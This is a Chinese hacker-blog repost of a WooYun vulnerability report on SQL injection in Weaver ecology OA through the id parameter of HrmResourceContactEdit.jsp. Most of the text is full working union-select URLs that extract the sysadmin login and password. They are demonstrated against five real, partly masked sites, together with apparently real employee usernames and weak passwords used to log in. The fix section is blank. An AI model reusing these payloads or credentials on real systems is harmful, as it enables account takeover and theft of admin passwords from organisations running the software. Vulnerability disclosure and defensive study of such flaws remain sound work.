记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

泛微ecology系统所有版本SQL注入(官网为例)二

2016-07-02 15:55

注入点:/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29&isView=1

注入参数为id

需要普通用户登录。

案例一:

在官网用手机号码登陆后进行测试,登陆后访问:

http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1

ecology11.png



由于版本不一样,所以字段数不一样,但是注入点是相同的。

案例二:http://**.**.**.**:812/login/Login.jsp?logintype=1

程凯/111111。登陆后访问:

http://**.**.**.**:812/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1

ecology12.png



案例三:http://**.**.**.**/login/Login.jsp?logintype=1

wangp/111111。登陆访问

http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1

ecology13.png



案例四:http://**.**.**.**:18881/login/login.jsp

guobg/1。这个字段数是92

登陆访问:

http://**.**.**.**:18881/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=88%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1

ecology14.png



案例五:**.**.**.**:8080/login/Login.jsp?logintype=1

杨先坤/111。字段数为105

登陆后访问:**.**.**.**:8080/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=35%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1

ecology16.png





测试的版本包括:8.100.0531+KB81001511、 7.100.0331 、5.000.0327+KB50001107、 4.100.0919

漏洞证明:

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2016-0191882

阅读:821548 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“泛微ecology系统所有版本SQL注入(官网为例)二”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云